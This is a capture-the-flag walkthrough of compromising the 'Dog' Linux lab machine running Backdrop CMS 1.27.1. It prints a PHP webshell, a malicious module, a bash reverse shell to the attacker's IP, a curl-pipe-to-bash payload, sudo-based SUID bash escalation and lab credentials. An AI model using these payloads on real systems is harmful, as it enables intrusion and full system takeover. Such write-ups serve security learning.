Dog was an easy-difficulty Linux box hosting SSH on port 22 and a Backdrop CMS web application on port 80. Initial reconnaissance revealed an exposed .git directory, which was downloaded using git-dumper to obtain the application's source code. Inspection of settings.php exposed database credentials, while further exploration revealed a valid CMS user account.

Using these credentials, I authenticated to the website and identified the version as 1.27.1, which is vulnerable to an RCE exploit. I used a publicly available Python script to achieve code execution as the www-data user.

To gain a more stable shell, I created a malicious Backdrop module containing a PHP script, packaging it as a .tar archive with a valid .info file. After installing the module and navigating to the shell file, it executed a command to download and run a reverse shell script via curl, granting a fully interactive shell.

Database access was possible using credentials found earlier, allowing me to dump password hashes from the users table. While cracking was in progress, I reused the known password to gain SSH access as the user johncusack.

Privilege escalation was achieved through a custom binary bee, which was allowed via sudo without a password. By leveraging its ev (eval) functionality and running it from the CMS root directory to satisfy bootstrap requirements, I executed arbitrary commands as root. I opted to copy a SUID version of /bin/bash, enabling full root access and capture of the root flag.

User flag

Initial nmap scan reveals 2 ports. SSH on 22 and HTTP on 80.

GIt repo exploration

Additionally, nmap has discovered an accessible git repo on the website, which I'll be able to download with gitdumper.

git-dumper http://10.10.11.58/.git git

In the settings.php file, I found a potential password.

And after a bit more searching, I found a user.

I'll visit the website next, testing whether these credentials will work.

Exploiting Backdrop RCE CVE

There is a login button in the top right corner. I'll try to login as Tiffany.

tiddany@dog.htb | BackDropJ2024DS2024

In the appearance tab, I found a potential version of Backdrop running on the box.

A quick search for Backdrop 1.27.1 CVEs brought both an exploit-db entry and a github PoC.

https://www.exploit-db.com/exploits/52021

https://github.com/rvizx/backdrop-rce

I ran the RCE script against the website.

python exploit.py http://10.10.11.58 tiffant@dog.htb BackDropJ2024DS2024

Getting a better shell on the box

I checked the /etc/passwd file for users who can have sessions on the box.

It's also possible to get valid users by enumerating home directories.

Most likely, I would be able to SSH with these users if I were to get their credentials.

This shell was very unstable and kept crashing after every few commands, so I pivoted to crafting a PHP webshell instead.

<?php
system($_GET['cmd']);
?>

I zipped up the webshell into a zip file and tried uploading it.

But it seems like .zip archives are not accepted. I created a .tar archive next.

tar -czvf shells.tar shell.php

But another error popped up.

I researched a little about the .info files and created one for my webshell.

name = Evil Shell
description = A simple malicious module
type = module
core = 1.x
backdrop = 1.x
package = Custom
version = 1.0

I installed the module, then navigated to /modules/shells/shell.php and added ?cmd=whoami to execute a whoami command.

I could not get a reverse shell using a regular bash -c "bash -i >% /dev/tcp/IP/PORT 0>&1" command. I tested whether I could get a callback via curl.

At this point, I decided to switch my approach. Instead of messing around with direct bash reverse shells, I'll create a new shell.sh file, which I'll host with a python server.

I will then change the webshell into a system call that runs curl to download the .sh file, and pipes it directly to bash. The shell.sh file will contain the normal bash -i revserse shell.

# shell.sh

#!/bin/bash
bash -i >& /dev/tcp/10.10.16.71/9001 0>&1

This will be hosted on my python server

# shell.php(in shells.tar archive)

<?php
system("curl http://10.10.16.71/shell.sh | bash");
?>

After installing the module again, I visited http://10.10.11.58/modules/shells/shell.php, and checked my python server.

Then my listener.

Extracting hashes from the database

In this shell, I can properly use mysql. When I found Tiffany's password, it was actually a part of some database connection string for mysql.

$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';

From this, I know that the user root has their password set to BackDropJ2024DS2024, and that there is a database named backdrop.

I made it easier for myself to copy the hashes by running a SELECT name, pass FROM users; query. I then saved them into a file on my box so that I could attempt cracking.

While hashcat was running, I noticed that going through rockyou would take a very long time (+3 days). I tried the database password against the two users from the passwd file, jobert and johncusack.

Root flag

Seeking a way to privesc

I ran bee and looked through its commands. I saw something interesting in the advanced options.

I can make it execute PHP commands by using ev.

It fails due to an insufficient bootstrap level. Backdrop is already there and configured, so I'll move to /var/www/html, which is where the site's config(and backdrop's) is.

And this worked. I can execute commands as root.

Gaining root access

There are many ways to get access as root. I could inject an SSH key into root's authorized_keys file, but a password was still required here. I can also create a SUID version of bash, or send myself a reverse shell.

I'll go with the SUID bash way. The commands to execute are cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash.

Rooted!